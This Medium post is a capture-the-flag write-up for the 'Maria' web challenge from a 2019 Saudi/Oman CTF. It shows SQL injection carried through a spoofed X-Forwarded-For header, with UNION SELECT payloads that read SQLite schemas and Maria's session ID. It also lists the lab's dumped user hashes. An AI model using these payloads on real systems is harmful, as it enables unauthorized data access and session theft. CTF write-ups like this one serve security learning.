Open in app

Sign in

Write

Sign in

[Saudi and Oman National Cyber Security CTF 2019] [Web] Maria WriteUp

AB2
3 min readFeb 10, 2019

--

Hello,

I’m about to share a WebSecurity WriteUp

Let’s Open the link and see what we have …

In this Challenge there is two hints:

1. The website store our IP address in database

2. Maria is the only person that can reveal the flag

The Source Code:

SELECT * FROM nxf8_sessions where ip_address = ‘*.*.*.*

We send that to BurpSuite

Let’s Try to change our IP Address from headers via BurpSuite ….

X-Forwarded-For: 127.0.0.1

IP Changed

let’s see if there is possibilities of any SQL injection ….

let’s reduce the number of columns to avoid the error message

So we have a SQLi …. (I can’t explain more those are basics as we know Just follow the pics …)

We are dealing with SQLite here

I found two tables:

nxf8_sessions

nxf8_users

Let’s grab columns via an easy method

X-Forwarded-For: 127.0.0.1' UNION SELECT 1,2,3,sql FROM sqlite_master WHERE type =’table’ AND name = ‘nxf8_sessions’ LIMIT 0,1 — -

And for users

X-Forwarded-For: 127.0.0.1' UNION SELECT 1,2,3,sql FROM sqlite_master WHERE type =’table’ AND name = ‘nxf8_users’ LIMIT 0,1 — -

From users I found that Maria ID is : 5

ID:

1,2,3,4,5,6,7,8

Name:

Alex,Trevor,Jacob,Paul,Maria,Mira,Michael,Joshua

Password:

f7af8e099d32a7d4de771c47d7d21000eb073c77,b6d435bbaa57016efe1f67b11f88fb47a459180a,7a19fdecb23571ed265321c9f764e6a6f81f3373,20af2164daf4bfaa73d89229782b8f01686584fe,d3e1330bac4810f24a5cd3d5a0e5a74e5d4c05c2,2f7a7814f81e84ecc4d73e8fd245fa603065632a,b19213f749af5e451d5f7ee4be0147294eea1709,506f329f5e6f5b456900b9f5ef6a308890d52cfc

Email:

alex@noweb.org,trevor@noweb.org,jacob@noweb.org,paul@noweb.org,maria@noweb.org,mira@noweb.org,michael@noweb.org,joshua@noweb.org

And in our challenge there is no login pages or anything let us to get the flag and its required to use Maria as an user ….

I tried to crack the password but nothing and after a while I get back to our “nxf8_sessions” Table

X-Forwarded-For: 127.0.0.1' UNION SELECT 1,2,3,session_id FROM nxf8_sessions WHERE user_id =5 LIMIT 0,1 — -

Follow me on Twitter : https://twitter.com/ab2pentest
If you liked my writeup and to support me for more :
https://www.buymeacoffee.com/ab2pentest
Other writeup’s and tool’s can be found here:
https://github.com/ab2pentest

Sign up to discover human stories that deepen your understanding of the world.

Free

Distraction-free reading. No ads.

Organize your knowledge with lists and highlights.

Tell your story. Find your audience.

Membership

Read member-only stories

Support writers you read most

Earn money for your writing

Listen to audio narrations

Read offline with the Medium app

Sql
Ctf Writeup
Pentesting
Web Security
Capture The Flag

--

--

AB2
AB2

Written by AB2

45 Followers
5 Following

Security Engineer @ TS | Ethical Hacker | Content Creator | CTF Player.

No responses yet

Write a response

What are your thoughts?

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams